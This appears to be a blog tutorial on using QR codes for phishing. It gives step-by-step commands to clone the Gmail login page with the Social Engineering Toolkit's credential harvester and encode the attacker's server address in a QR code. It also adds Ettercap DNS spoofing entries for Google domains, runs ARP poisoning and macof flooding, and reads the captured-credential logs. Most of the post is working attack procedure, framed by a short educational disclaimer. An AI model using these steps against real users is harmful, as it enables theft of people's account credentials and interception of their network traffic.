QR Code Attack Vector :: Spoofing, Poisoning and Phishing aplications with QR Codes

QR code is a structured code in an image that can be read by specific readers that reveal their content or perform redirect functions for pages and so on. This tool, which was created especially for parts catalog and inventory management, is now used in various posters, business cards, banners, manuals, flayers and etc, and because of its popularization, it is also easy to be circumvented to give advantages To attackers and trolls in order to take some advantage of the personnel since this reading and interpretation is already found on phones, tablets and other personal gadgets. In this text I will approach this attack vector showing possible ways to exploit, either by phishing sending the request to a specific server or by performing DNS Spoof and ARP Poisoning with other tools.

We will perform the attack using the setoolkit (Social Engineering Toolkit). A very powerful social engineering attack framework that we will use to clone websites and place the same inside an NFC tag and within a QR Code.

First let’s open Seetoolkit and perform a simple GMAIL clone for our localhost

 # setoolkit   

Select in order

 1) Social-Engineering Attacks  
 2) Website Attack Vectors  
 3) Credential Harvester Attack Method  
 2) Site Cloner  

Enter the IP of the attacking machine: ex: 192.168.1.56
Enter the URL to be cloned ex: ‘https://accounts.google.com

If you have followed all the settings we have in this Post, the entire site will be cloned into the / var / www / html /

Try to access it by localhost through the browser

 http://localhost  

Creating the QR Code
Now let’s put the URL of our server inside the QR Code
There are several methods of generating QR Codes, including online tools. You can choose what you prefer, we even have a function of that within setoolkit. However, I decided to opt for a simpler alternative to this post, qrencode.

 # sudo apt-get install qrencode  
 # qrencode 'http://192.168.1.56' -o qr_atack.png  

If you are in environments where you do not have direct access to the network, and did not want to leave so face-off the attack, you can make use of link shortcuts as bit.ly to point to the IP of your fake Web server. However, we can further fine-tune this technique with the Ettercap ARP Poisoning function if we are in the same attack network to poison the DNS and ARP table of the router and victim, making it appear authentically that we are really the chosen server.

Performing Spoofing DNS from the target page
It is also possible to perform DNS and ARP spoofing of the cloned site using a Man in the Middle technique with Ettercap to ‘fool’ the gateway and the victim, making them think that you are the requested server, even appearing the true url Of the site during the attack.

This process was covered in more detail in this post, but I will give a basic application in it here. If you are interested in going deeper into exploring this feature, feel free to do so. 🙂

Let’s edit the Ettercap DNS configuration file and add the following lines at the end of the file, changing only your IP.

 # vim /etc/ettercap/etter.dns  
 #GMAIL SPOOFING  
 gmail.com A 192.168.1.56  
 https://accounts.google.com/ A 192.168.1.56  
 * *.gmail.com A 192.168.1.56  
 accounts.google.com/ A 192.168.1.56  
 mail.google.com A 192.168.1.56  
 ~                     

Configuring Ettercap
Now let’s open Ettercap and parameterize the same to continue the attack:

On the Sniff tab select the “Unified Sniff”
In the Host tab, select the “Scan for hosts” option or give Ctrl + S to search the hosts on your network.
Again in the “hosts” tab select the “Host List”

Select the IP of the Gateway and the IP that you want to sniff and click on “Add to Target 2”

Notice:
If you are attacking a network with Switches, open a terminal, and as root type:

 # macof  
Then click on “Plugins” and then after a double click on the “dns_spoof”
After that, go to the Mitm tab and select “Arp Poisoning” by clicking the “Sniff remote connections” checkbox and click on Ok. Then go to the “Start” tab and select “Start Sniffing”

Testing method:

You can capture Setookit posts within the apache directory, with the harvester logs. They are organizer by date and time, as you can see as you progress through the tests.

 # cat /var/www/html/harvester_2016-01-07\ 23\:46\:29.762995.txt   

Remembering that this article has educational purpose for professionals and students of Information Security. We are not responsible for the misuse of the techniques learned here.

The upcoming posts will address this exploit in NFC Tags and Google Beacons to show more recent vectors of this material.
🙂

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s